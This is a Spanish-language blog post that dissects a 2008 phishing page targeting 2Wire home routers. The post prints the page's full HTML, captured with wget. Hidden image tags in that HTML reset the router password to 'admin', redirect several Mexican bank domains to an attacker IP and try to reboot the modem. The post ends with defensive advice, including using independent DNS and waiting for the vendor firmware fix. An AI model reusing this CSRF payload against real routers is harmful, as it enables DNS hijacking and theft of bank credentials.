Nuevo exploit 2wire (viejo exploit)

Bueno no demasiada novedad, pero parece ser que mediante flash, tambien se puede cambiar el password del 2wire. (nota mas bien muestra el flash mientras ejecuta otras cosas, wget ayuda mucho)

http://promociones-telcel.mx.gd

vicm3@avalon:~$ wget http://promociones-telcel.mx.gd
--15:14:54-- http://promociones-telcel.mx.gd/
=> `index.html'
Resolving promociones-telcel.mx.gd... 213.177.195.71
Connecting to promociones-telcel.mx.gd|213.177.195.71|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 728 [text/html]

100%[
=
=
======>] 728 --.--K/s

15:14:55 (12.49 MB/s) - `index.html' saved [728/728]

vicm3@avalon:~$ more index.html

<html>
<head>
<title>PROMOCIONES TELCEL</title>
<meta name="keywords" content="">
<meta name="description" content="">
<meta name="robots" content="INDEX, FOLLOW">
<meta name="revisit-after" content="10 days">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
if(top.frames.length > 0)
top.location.href=self.location;
</script>

</head>

<frameset rows="100%,*" frameborder="NO" border="0" framespacing="0">
<frame name="main_frame" src="http://72.167.148.67/telcel/">
</frameset>

<noframes>
<body bgcolor="#FFFFFF" text="#000000">
<a href="http://72.167.148.67/telcel/">Pulsa aquí para ir a PROMOCIONES T
ELCEL</a>
</body>
</noframes>
</html>

 

vicm3@avalon:~$ wget http://72.167.148.67/telcel/
--15:15:06-- http://72.167.148.67/telcel/
=> `index.html.1'
Connecting to 72.167.148.67:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

[ <=> ] 9,738 --.--K/s

15:15:06 (71.63 KB/s) - `index.html.1' saved [9738]

vicm3@avalon:~$ more index.html.1

<html>
<head>
<title>Promociones Telcel</title>

<!--Derechos Reservados duskrow-->
<body>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://do
wnload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" wid
th="837" height="465">
  <param name="movie" value="a.swf">
  <param name="quality" value="high">
  <embed src="telcel.swf" quality="high" pluginspage="http://www.macromedia.com/
go/getflashplayer" type="application/x-shockwave-flash" width="837" height="465"
></embed>
</object>

<!--Primer entrada-->
<img src=http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin
&PASSWORD_CONF=admin&HINT=  alt=<em> width="1" height="1">

<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bo
veda.banamex.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<!--banamex-->
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda
.banamex.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancan
etempresarial.banamex.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.ba
ncanetempresarial.banamex.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1"
>
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.ac
citrade.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=accitr
ade.com.mx&ADDR=72.167.148.67 alt=<em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.ba
namex.com&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=baname
x.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.ba
namex.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=baname
x.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<!--banco azteca-->
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.ba
ncoazteca.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancoa
zteca.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.ba
ncoazteca.com&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancoa
zteca.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<!--bancomer-->
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.ba
ncomer.com&ADDR=72.167.148.67 alt=</em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancom
er.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.ba
ncomer.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancom
er.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">

<!--segunda entrada-->

<img src=http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J33&P
ASSWORD=admin&PASSWORD_CONF=admin&HINT= alt=</em> width="1" height="1">

<!--banamex-->
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.boveda.banamex.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1"
>
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=boveda.banamex.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=bancanetempresarial.banamex.com.mx&ADDR=72.167.148.67  alt=<em> width="1" h
eight="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=72.167.148.67  alt=</em> width="
1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.accitrade.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=accitrade.com.mx&ADDR=72.167.148.67 alt=</em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.banamex.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=banamex.com&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.banamex.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=banamex.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">

<!--banco azteca-->
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.bancoazteca.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=bancoazteca.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=bancoazteca.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.bancoazteca.com&ADDR=72.167.148.67  alt=</em> width="1" height="1">

<!--bancomer-->
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.bancomer.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=bancomer.com&ADDR=72.167.148.67 alt=</em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=www.bancomer.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SE
T&NAME=bancomer.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">

<!--tercer entrada-->

<img src=http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSW
ORD=admin&PASSWORD_CONF=admin&HINT= alt=<em> width="1" height="1">

<!--banamex-->
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.boveda.banamex.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=boveda.banamex.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=bancanetempresarial.banamex.com.mx&ADDR=72.167.148.67  alt=</em> width="1" heigh
t="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.bancanetempresarial.banamex.com.mx&ADDR=72.167.148.67  alt=<em> width="1" h
eight="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.accitrade.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=accitrade.com.mx&ADDR=72.167.148.67 alt=<em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.banamex.com&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=banamex.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.banamex.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=banamex.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">

<!--banco azteca-->
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.bancoazteca.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=bancoazteca.com.mx&ADDR=72.167.148.67  alt=<em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.bancoazteca.com&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=bancoazteca.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">

<!--bancomer-->
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.bancomer.com.mx&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=bancomer.com.mx&ADDR=72.167.148.67 alt=<em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=www.bancomer.com&ADDR=72.167.148.67  alt=</em> width="1" height="1">
<img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NA
ME=bancomer.com&ADDR=72.167.148.67  alt=<em> width="1" height="1">

<!--aki vamos a reiniciar infinitum-->

<!--primer intento-->
<img src=http://home/xslt?PAGE=%0D%0A  alt=</em> width="1" height="1">

<!--segundo intento-->
<img src=http://192.168.1.254/xslt?PAGE=%0D%0A  alt=<em> width="1" height="1">

<!--tercer intento-->
<img src=http://gateway.2wire.net/xslt?PAGE=%0D%0A  alt=</em> width="1" height="1">

<!--Derechos Reservados duskrow-->

</body>
</head>
</html>

 

Bueno tiene la bondad de cambiar el password que haya puesto el usuario y de nuevo va sobre banamex, bancoazteca, bancomer, etc. Es una ventaja que use mi propio dns y no el del 2wire.

Por otra parte creo aun les falta arreglar un par de detalles...

Update 2/3/2008
Un par de cosas que note con esto, ya con un poco de calma:
1) Si tu configuración no es la default ayuda bastante 192.168.1.254 no es la direccion de mi 2wire es 0.253 primero por que originalmente mi dns era el .0.254 y segundo uso la red 192.168.0.1 en lugar de la 192.168.1.1 por que asi aprendi en su epoca a hacer el ejemplo y se me quedo.
2) En la configuracion de mis maquinas fijas uso como dns primario mi maquina linux 192.168.0.1 y como secundario y gw el 2wire, de tal forma que aun cuando apago el flash este mi 2wire, no le pudo añadir las entradas de dns y el otro dia viendo cuando un mejor script lo logro, como tomo los valores primero del dns linux, no me afecto (aunque si me llevo un rato encontrar como quitarlas).
3) Se supone que 2wire y telmex ya estan al tanto de esto y han sacado un firmware actualizado, el cual segun de manera automagica debiera de llegar a nuestros modems (a la fecha el mio nomas no se actualiza), siguiendo un consejo en adslreports levante un ticket de soporte en 2wire (a ver si el martes se dignan a contestarlo)... si no pues a ver si perdiendo un rato tiempo en soporte, me cambian el modem (yeah right).
4) Una solucion que se me ocurre para quien no puede poner su propio dns es usar los dns de opendns o de otros proyectos que ofrecen dns y no los del modem... con todo en muchas ocasiones tienen menor latencia y se caen menos seguido, en todo caso, espero pronto envien la actualización mi modem es un 1700HG con fw3.7.1!!!!